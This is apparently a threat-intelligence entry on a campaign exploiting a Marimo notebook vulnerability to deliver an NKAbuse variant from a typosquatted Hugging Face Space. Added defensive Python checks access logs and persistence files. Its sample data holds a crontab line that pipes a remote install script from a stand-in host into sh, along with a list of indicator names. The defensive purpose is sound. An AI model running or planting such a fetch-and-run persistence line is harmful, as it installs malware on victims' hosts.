Campaign
Marimo exploitation delivered through a typosquatted Hugging Face Space
Updated 16.04.2026 19:58
Case score 58
First seen 16.04.2026 19:58
Last seen 16.04.2026 19:58
Overview
Attackers exploited **CVE-2026-39987** in **Marimo**, a reactive Python notebook, and then used **Hugging Face Spaces** as delivery infrastructure: a typosquatted Space named **vsccode-modetx** hosts **install-linux.sh** and a **kagent** binary. The post-exploitation chain fetched the script with curl and installed a previously undocumented **NKAbuse** variant. The payload runs shell commands and returns their output to the operator, and can establish persistence through **systemd**, **cron**, or a **macOS LaunchAgent**.
Hosting the payload on a trusted cloud-hosted development service turns that service into post-exploitation infrastructure and makes victims less likely to question the download source; the delivery path runs through the malicious Space rather than a direct vendor-hosted payload.
Recommended response is to upgrade **Marimo** to **0.23.0** or later, or to block external access to **/terminal/ws**. Available evidence supports active exploitation and malware delivery but does not identify the operator or quantify the reach of the activity.
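Two defender-side checks derived from the entry above, as an added example that is not part of the case entry: the first verifies that the recommended block on **/terminal/ws** holds by flagging requests to it from outside loopback and RFC1918 ranges; the second sweeps systemd units, crontabs and LaunchAgent plists for the names the campaign uses. The access-log format, file contents and the Space URL are constructed; the real Space owner is not given on the page.

```python
import ipaddress
import re

# Names the case entry attributes to the campaign (typosquatted Space, dropper, binary).
IOC_TOKENS = ("vsccode-modetx", "install-linux.sh", "kagent")

# Ranges treated as internal; everything else is external for the /terminal/ws check.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8", "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "::1/128", "fc00::/7")]

# Combined-log-style line: client ip, request line, status (constructed format assumption).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def is_internal(ip: str) -> bool:
    """True when the source address falls in one of INTERNAL_NETS."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in INTERNAL_NETS)

def external_terminal_hits(log_lines):
    """Return (ip, path) for /terminal/ws requests from external sources.
    With external access blocked as recommended, this list should stay empty."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group("path").startswith("/terminal/ws") and not is_internal(m.group("ip")):
            hits.append((m.group("ip"), m.group("path")))
    return hits

def persistence_matches(artifacts):
    """artifacts: {path: contents} read from systemd units, crontabs, LaunchAgent plists.
    Return {path: [tokens found]} for files that reference the campaign's names."""
    found = {}
    for path, text in artifacts.items():
        tokens = [t for t in IOC_TOKENS if t in text]
        if tokens:
            found[path] = tokens
    return found

# Constructed samples: one external and one internal hit on the websocket endpoint.
SAMPLE_LOG = [
    '203.0.113.7 - - [16/Apr/2026:19:58:01 +0000] "GET /terminal/ws HTTP/1.1" 101 0',
    '10.0.0.5 - - [16/Apr/2026:19:58:05 +0000] "GET /terminal/ws HTTP/1.1" 101 0',
    '203.0.113.7 - - [16/Apr/2026:19:58:09 +0000] "GET / HTTP/1.1" 200 512',
]
SAMPLE_ARTIFACTS = {  # constructed; OWNER-PLACEHOLDER stands in for the unknown Space owner
    "/etc/systemd/system/kagent.service": "[Service]\nExecStart=/usr/local/bin/kagent\n",
    "/var/spool/cron/crontabs/root": "@reboot curl -fsSL https://hf.example/spaces/OWNER-PLACEHOLDER/vsccode-modetx/install-linux.sh | sh\n",
    "~/Library/LaunchAgents/com.example.plist": "<string>/usr/bin/true</string>\n",
}
```

On a live host, feed `external_terminal_hits` the reverse proxy or Marimo access log and build the `artifacts` dict by reading the three persistence locations named above.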